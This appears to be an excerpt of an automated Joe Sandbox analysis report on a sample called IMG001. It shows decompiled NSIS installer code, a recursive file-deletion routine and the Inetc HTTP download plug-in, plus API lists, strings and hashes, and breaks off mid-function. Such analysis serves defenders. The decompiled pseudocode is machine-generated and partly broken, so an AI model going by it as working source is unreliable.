HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 738129E4
HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,A0000000), ref: 738129FC
HttpAddRequestHeadersA.WININET(00000000,738159A8,000000FF,A0000000), ref: 73812A14
HttpAddRequestHeadersA.WININET(00000000,00000000,000000FF,A0000000), ref: 73812A28
wsprintfA.USER32 ref: 73812A44
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 73812A5C
wsprintfA.USER32 ref: 73812A79
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 73812A91
InternetQueryOptionA.WININET(00000000,0000001F,?,?), ref: 73812AB4
InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 73812AC9
InternetErrorDlg.WININET(00000000,00002EEE,00000007,00000000), ref: 73812B19
HttpQueryInfoA.WININET(00000000,00000005,?,?,00000000), ref: 73812B63
InternetSetFilePointer.WININET(00000000,00000000,00000000,00000000,00000000), ref: 73812B8D

Strings

Content-Type: octet-streamContent-Length: %d, xrefs: 73812A73
Content-Type: application/x-www-form-urlencoded, xrefs: 738129F6
POST, xrefs: 7381297A
HEAD, xrefs: 73812730, 73812759, 73812908
Proxy-authorization: basic %s, xrefs: 73812780, 738129C6
PUT, xrefs: 73812996, 7381299E
Authorization: basic %s, xrefs: 738127B3, 73812A3E

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: Http$Request$Headers$Internet$wsprintf$Query$Info$ErrorFileOpenOptionlstrcpyn$CloseHandlePointerReadSend
String ID: Authorization: basic %s$Content-Type: application/x-www-form-urlencoded$Content-Type: octet-streamContent-Length: %d$HEAD$POST$PUT$Proxy-authorization: basic %s
API String ID: 2926174240-387942550
Opcode ID: 9dc38082779bfe37092ce738975c75fde3a7167d80a4bdb2bd0ab48836980235
Instruction ID: 459dca158fed4f46ceb84af030f16b24b4f5802bebec456aaf4e140106102e74
Opcode Fuzzy Hash: 9dc38082779bfe37092ce738975c75fde3a7167d80a4bdb2bd0ab48836980235
Instruction Fuzzy Hash: 4AC1E6B250551EFEEB52EBA98C85FDB377EAB04314F34026DE54AE70C0D7704AA48B60

Uniqueness

Uniqueness Score: -1.00%

Function 004030DE, Relevance: 58.0, APIs: 23, Strings: 10, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				signed int _t106;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x7c5758 = _t34;
				 *0x7c56a4 = E00405D12(8);
				SHGetFileInfoA(0x7a8468, 0,  &_v360, 0x160, 0); // executed
				E004059F0(0x7c16a0, "NSIS Error");
				E004059F0(0x7ee000, GetCommandLineA());
				 *0x7c56a0 = GetModuleHandleA(0);
				_t42 = 0x7ee000;
				if( *0x7ee000 == 0x22) {
					_v404 = 0x22;
					_t42 = 0x7ee001;
				}
				_t44 = CharNextA(E0040550E(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E0040550E(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								__eflags = _t44 + 2;
								E004059F0(0x7f0000, _t44 + 2);
								L20:
								GetTempPathA(0x2000, 0x7f8000); // executed
								_t48 = E004030AA(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA(0x7f6000); // executed
									_t50 = E00402C22(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E0040345F();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x7c5734;
											if( *0x7c5734 != 0) {
												_t106 = E00405D12(3);
												_t100 = E00405D12(4);
												_t55 = E00405D12(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x7c574c;
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E004052B1(_v408, 0x200010);
										ExitProcess(2);
									}
									if( *0x7c56bc == 0) {
										L31:
										 *0x7c574c =  *0x7c574c | 0xffffffff;
										_v400 = E00403539();
										goto L32;
									}
									_t103 = E0040550E(0x7ee000, 0);
									while(_t103 >= 0x7ee000) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - 0x7ee000;
									_v408 = "Error launching installer";
									if(_t103 < 0x7ee000) {
										lstrcatA(0x7f8000, "~nsu.tmp");
										if(lstrcmpiA(0x7f8000, 0x7f4000) == 0) {
											goto L32;
										}
										CreateDirectoryA(0x7f8000, 0);
										SetCurrentDirectoryA(0x7f8000);
										if( *0x7f0000 == 0) {
											E004059F0(0x7f0000, 0x7f4000);
										}
										E004059F0(0x7c6000, _v396);
										 *0x7c8000 = 0x41;
										_t98 = 0x1a;
										do {
											E00405A12(0, _t98, 0x7a6468, 0x7a6468,  *((intOrPtr*)( *0x7c56b0 + 0x120)));
											DeleteFileA(0x7a6468);
											if(_v416 != 0 && CopyFileA(0x7fc000, 0x7a6468, 1) != 0) {
												_push(0);
												_push(0x7a6468);
												E0040573E();
												E00405A12(0, _t98, 0x7a6468, 0x7a6468,  *((intOrPtr*)( *0x7c56b0 + 0x124)));
												_t79 = E00405250(0x7a6468);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x7c8000 =  *0x7c8000 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(0x7f8000);
										E0040573E();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E004055C4(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E004059F0(0x7f0000, _t104);
									E004059F0(0x7f2000, _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(0x7f8000, 0x1ffb);
								lstrcatA(0x7f8000, "\\Temp");
								_t89 = E004030AA(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

APIs

#17.COMCTL32 ref: 004030FD
SetErrorMode.KERNEL32(00008001), ref: 00403108
OleInitialize.OLE32(00000000), ref: 0040310F

Part of subcall function 00405D12: GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
Part of subcall function 00405D12: LoadLibraryA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D2F
Part of subcall function 00405D12: GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

SHGetFileInfoA.SHELL32(007A8468,00000000,?,00000160,00000000,00000008), ref: 00403137

Part of subcall function 004059F0: lstrcpynA.KERNEL32(?,?,00002000,0040314C,007C16A0,NSIS Error), ref: 004059FD

GetCommandLineA.KERNEL32(007C16A0,NSIS Error), ref: 0040314C
GetModuleHandleA.KERNEL32(00000000,007EE000,00000000), ref: 0040315F
CharNextA.USER32(00000000,007EE000,00000020), ref: 0040318A
GetTempPathA.KERNEL32(00002000,007F8000,00000000,00000020), ref: 0040321D
GetWindowsDirectoryA.KERNEL32(007F8000,00001FFB), ref: 00403232
lstrcatA.KERNEL32(007F8000,\Temp), ref: 0040323E
DeleteFileA.KERNEL32(007F6000), ref: 00403251
OleUninitialize.OLE32(00000000), ref: 004032CF
ExitProcess.KERNEL32 ref: 004032EF
lstrcatA.KERNEL32(007F8000,~nsu.tmp,007EE000,00000000,00000000), ref: 004032FB
lstrcmpiA.KERNEL32(007F8000,007F4000,007F8000,~nsu.tmp,007EE000,00000000,00000000), ref: 00403307
CreateDirectoryA.KERNEL32(007F8000,00000000), ref: 00403313
SetCurrentDirectoryA.KERNEL32(007F8000), ref: 0040331A
DeleteFileA.KERNEL32(007A6468,007A6468,?,007C6000,?), ref: 00403364
CopyFileA.KERNEL32(007FC000,007A6468,00000001), ref: 00403378
CloseHandle.KERNEL32(00000000,007A6468,007A6468,?,007A6468,00000000), ref: 004033A5
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033FA
ExitWindowsEx.USER32(00000002,00000000), ref: 00403436
ExitProcess.KERNEL32 ref: 00403459

Strings

NCRC, xrefs: 004031CA
~nsu.tmp, xrefs: 004032F5
\Temp, xrefs: 00403238
hdz, xrefs: 0040334D
_?=, xrefs: 00403278
/D=, xrefs: 004031E0
", xrefs: 004031AC
Error launching installer, xrefs: 00403287
NSIS Error, xrefs: 0040313D
SeShutdownPrivilege, xrefs: 0040340C

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$hdz$~nsu.tmp
API String ID: 2278157092-3982731155
Opcode ID: d78d33de5b68f580e0f006418b0ffb6605f002c23cf02c91c73e52bd5a976f7d
Instruction ID: 1e8516f5ce796388342c1fc8f15df4c02dee863aaf22805bb0e40bc668e7fd09
Opcode Fuzzy Hash: d78d33de5b68f580e0f006418b0ffb6605f002c23cf02c91c73e52bd5a976f7d
Instruction Fuzzy Hash: B0911171904741AEE7216F618C49B2B3E9CEF05306F04457EF581BA2D2CB7C99448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 00405315, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00405315(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004055C4(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x7c5728 =  *0x7c5728 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E004059F0(0x7b84b8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E0040552A(_t72);
					} else {
						lstrcatA(0x7b84b8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x7b84b8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E0040550E( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E004059F0(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004056A8(_t72);
									_t52 = DeleteFileA(_t72); // executed
									__eflags = _t52;
									if(_t52 != 0) {
										E00404D8E(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x7c5728 =  *0x7c5728 + 1;
										} else {
											E00404D8E(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E0040573E();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405315(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x7b84b8 - 0x5c;
					if( *0x7b84b8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405CEB(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004054E3(_t72);
							E004056A8(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D8E(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404D8E(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E0040573E();
						}
						L33:
						 *0x7c5728 =  *0x7c5728 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

APIs

DeleteFileA.KERNEL32(?,?,007EE000,00000000), ref: 00405333
lstrcatA.KERNEL32(007B84B8,\*.*,007B84B8,?,00000000,?,007EE000,00000000), ref: 0040537D
lstrcatA.KERNEL32(?,00409010,?,007B84B8,?,00000000,?,007EE000,00000000), ref: 0040539E
lstrlenA.KERNEL32(?,?,00409010,?,007B84B8,?,00000000,?,007EE000,00000000), ref: 004053A4
FindFirstFileA.KERNEL32(007B84B8,?,?,?,00409010,?,007B84B8,?,00000000,?,007EE000,00000000), ref: 004053B5
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405467
FindClose.KERNEL32(?), ref: 00405478

Strings

\*.*, xrefs: 00405377

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 334688b312b6124aefc05cdd8cb0662490542fd7c7b51c765d808e32e330ee28
Instruction ID: a3bd02508b0b95f8a0c7cde32addaa27e2f8db40fee80c7c76cb9bfc506cccd8
Opcode Fuzzy Hash: 334688b312b6124aefc05cdd8cb0662490542fd7c7b51c765d808e32e330ee28
Instruction Fuzzy Hash: F351B030904A44AACB216B219C45BFF3B68DF42765F14817FFD01751D2D77C49819F6A

Uniqueness

Uniqueness Score: -1.00%

Function 00405CEB, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405CEB(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x7bcd00); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7bcd00;
			}

0x00405cf6
0x00405cff
0x00000000
0x00405d0c
0x00405d02
0x00000000

APIs

FindFirstFileA.KERNEL32(?,007BCD00,007BA4B8,00405607,007BA4B8,007BA4B8,00000000,007BA4B8,007BA4B8,?,?,00000000,00405329,?,007EE000,00000000), ref: 00405CF6
FindClose.KERNEL32(00000000), ref: 00405D02

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1ca473d55b8aa3f231cefed5bcfc42c0dfe78d3d248200b2f8c286e45b37ad6d
Instruction ID: a9cba8e735bd77091c38ad40f287727c35eedbeaf980a92083549f84fef47ecd
Opcode Fuzzy Hash: 1ca473d55b8aa3f231cefed5bcfc42c0dfe78d3d248200b2f8c286e45b37ad6d
Instruction Fuzzy Hash: AFD0C9359195206BC20117286C0C98B6A58DF05330720DA32B025E22E0C2349C518AA9

Uniqueness

Uniqueness Score: -1.00%

Function 73813011, Relevance: 231.7, APIs: 89, Strings: 43, Instructions: 747
stringwindowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E73813011(void* __ecx, void* __eflags, struct HWND__* _a4, long _a8, long _a12, int _a16, void* _a20) {
				struct tagMSG _v32;
				char _v95;
				char _v96;
				char _v159;
				char _v160;
				CHAR* _t45;
				void* _t48;
				void* _t49;
				CHAR* _t50;
				signed char _t52;
				long _t53;
				struct HWND__* _t54;
				void* _t56;
				void* _t61;
				long _t62;
				signed int _t63;
				int _t66;
				CHAR* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				short* _t77;
				signed int _t78;
				void* _t97;
				struct HWND__* _t100;
				struct _SECURITY_ATTRIBUTES* _t104;
				struct HWND__* _t107;
				struct _SECURITY_ATTRIBUTES* _t115;
				struct _SECURITY_ATTRIBUTES* _t117;
				struct _SECURITY_ATTRIBUTES* _t119;
				struct HWND__* _t134;
				CHAR* _t139;
				struct _SECURITY_ATTRIBUTES* _t143;
				struct _SECURITY_ATTRIBUTES* _t144;
				struct _SECURITY_ATTRIBUTES* _t145;
				struct _SECURITY_ATTRIBUTES* _t146;
				struct _SECURITY_ATTRIBUTES* _t147;
				struct _SECURITY_ATTRIBUTES* _t148;
				struct _SECURITY_ATTRIBUTES* _t149;
				struct _SECURITY_ATTRIBUTES* _t150;
				struct _SECURITY_ATTRIBUTES* _t151;
				struct _SECURITY_ATTRIBUTES* _t152;
				struct _SECURITY_ATTRIBUTES* _t153;
				struct _SECURITY_ATTRIBUTES* _t154;
				struct _SECURITY_ATTRIBUTES* _t155;
				struct _SECURITY_ATTRIBUTES* _t156;
				struct _SECURITY_ATTRIBUTES* _t157;
				struct _SECURITY_ATTRIBUTES* _t158;
				struct _SECURITY_ATTRIBUTES* _t159;
				struct _SECURITY_ATTRIBUTES* _t160;
				struct _SECURITY_ATTRIBUTES* _t161;
				long _t164;
				struct _SECURITY_ATTRIBUTES* _t166;
				void* _t167;
				void* _t170;
				int _t171;
				signed int _t175;
				struct _SECURITY_ATTRIBUTES* _t177;
				short* _t178;
				int _t180;
				void* _t181;
				void* _t193;
				int _t210;
				long _t221;
				struct HWND__* _t224;
				void* _t227;
				char _t231;
				void* _t233;
				signed int _t234;
				struct HWND__* _t247;
				void* _t248;
				long _t250;
				int _t251;
				struct HWND__* _t252;
				void* _t254;
				struct HWND__* _t256;
				void* _t257;
				void* _t258;
				void* _t260;
				void* _t261;
				void* _t265;
				signed int _t308;
				signed int _t309;
				struct _SECURITY_ATTRIBUTES* _t310;

				_v160 = 0;
				E73811000( &_v159, 0, 0x3f);
				_v96 = 0;
				E73811000( &_v95, 0, 0x3f);
				_t250 = _a8;
				 *0x73818c34 = _a16;
				_t261 = _t260 + 0x18;
				 *0x73818c30 = _a12;
				 *0x73818c38 = _t250;
				 *0x73815add = 0;
				 *0x73815adc = 0;
				 *0x73815adb = 0;
				 *0x73815ada = 0;
				 *0x73815ad9 = 0;
				 *0x73815ad8 = 0;
				 *0x738156c0 = 0;
				 *0x73815ad4 = 0;
				 *0x73815ab4 = 1;
				 *0x73815bb0 = 0;
				 *0x73815b30 = 0;
				 *0x738158a8 = 0;
				 *0x738157e8 = 0;
				 *0x73815828 = 0;
				_t45 = LocalAlloc(0x40, _t250);
				_t246 = _t45;
				 *0x738157cc = _t45;
				_t265 =  *0x738157e4; // 0x0
				if(_t265 != 0) {
					E73813B5A(_t246);
					lstrcpyA( *0x738157e4,  *0x738157cc);
					_t221 = lstrlenA( *0x738157e4);
					_t246 =  *0x738157cc; // 0x3146150
					 *0x73815aac = _t221;
				}
				_t48 = 1;
				_t230 =  !=  ? _t48 :  *0x73815ad8 & 0x000000ff;
				 *0x73815ad8 =  !=  ? _t48 :  *0x73815ad8 & 0x000000ff;
				_t49 = E73813B5A(_t246);
				while(_t49 == 0) {
					_t50 =  *0x738157cc; // 0x3146150
					__eflags =  *_t50 - 0x2f;
					if( *_t50 != 0x2f) {
						L65:
						E73813B9E(_t50);
						if( *0x738158a8 == 0) {
							lstrcpyA("NSIS_Inetc (Mozilla)", "NSIS_Inetc (Mozilla)");
						}
						if(_v96 != 0 && _v160 != 0) {
							wsprintfA( *0x738157cc, "%s:%s",  &_v160,  &_v96);
							_t139 =  *0x738157cc; // 0x3146150
							E738113A9(_t230, lstrlenA(_t139), _t139, 0x73815bb0);
							_t261 = _t261 + 0x1c;
						}
						_t224 = _a4;
						if(_t224 == 0) {
							L76:
							__imp__#17();
							goto L77;
						} else {
							_t134 = FindWindowExA(_t224, 0, "#32770", 0);
							 *0x73815ae0 = _t134;
							if(_t134 == 0 ||  *0x73815ad8 != 0) {
								goto L76;
							} else {
								_t241 =  ==  ? "Inetc plug-in" : 0x73815828;
								SetDlgItemTextA(_t134, 0x3ee,  ==  ? "Inetc plug-in" : 0x73815828);
								L77:
								_t247 =  *0x73815ae0; // 0x0
								_t231 =  *0x73815ad9; // 0x1
								if(_t247 != 0) {
									_t52 =  *0x73815ad8; // 0x1
								} else {
									_t257 = 1;
									_t52 =  ==  ? _t257 :  *0x73815ad8 & 0x000000ff;
									 *0x73815ad8 = _t52;
								}
								if(_t52 != 0) {
									 *0x73815ada = 0;
									_t231 = 1;
									 *0x73815ad9 = 1;
								}
								if(_t231 == 0) {
									SetWindowLongA( *0x73815ae0, 0xfffffff0, GetWindowLongA(_t247, 0xfffffff0) | 0x04000000);
								}
								_t53 = GetTickCount();
								_push(0);
								 *0x73815acc = _t53;
								_t54 =  *0x73815ae0; // 0x0
								_push(E7381119C);
								_t55 =  !=  ? _t224 : _t54;
								_push( !=  ? _t224 : _t54);
								_t56 = 0x6e;
								_t248 = 0x65;
								_t57 =  !=  ? _t248 : _t56;
								_t58 = ( !=  ? _t248 : _t56) & 0x0000ffff;
								_t233 = 0x6c;
								_t59 =  !=  ? _t233 : ( !=  ? _t248 : _t56) & 0x0000ffff;
								_t60 = ( !=  ? _t233 : ( !=  ? _t248 : _t56) & 0x0000ffff) & 0x0000ffff;
								_t61 = CreateDialogParamA( *0x738156c4, ( !=  ? _t233 : ( !=  ? _t248 : _t56) & 0x0000ffff) & 0x0000ffff, ??, ??, ??); // executed
								 *0x73815ae4 = _t61;
								if(_t61 == 0) {
									 *0x73815ab4 = 7;
									_t62 = GetLastError();
									_t63 =  *0x73815ab4; // 0x4
									_t66 = lstrlenA((_t63 << 5) + 0x73815000);
									_t234 =  *0x73815ab4; // 0x4
									_t35 = _t66 + 0x73815000; // 0x4b4f
									_t68 = _t35 + (_t234 << 5);
									__eflags = _t68;
									wsprintfA(_t68, " (Err=%d)", _t62);
								} else {
									_t97 = CreateThread(0, 0, E73811657, _t61, 0,  &_a12); // executed
									_t227 = _t97;
									if(_t227 == 0) {
										 *0x73815ab4 = 0x14;
										DestroyWindow( *0x73815ae4);
										L111:
										do {
											L112:
										} while (E73813B5A( *0x738157cc) == 0 && lstrcmpiA( *0x738157cc, "/end") != 0);
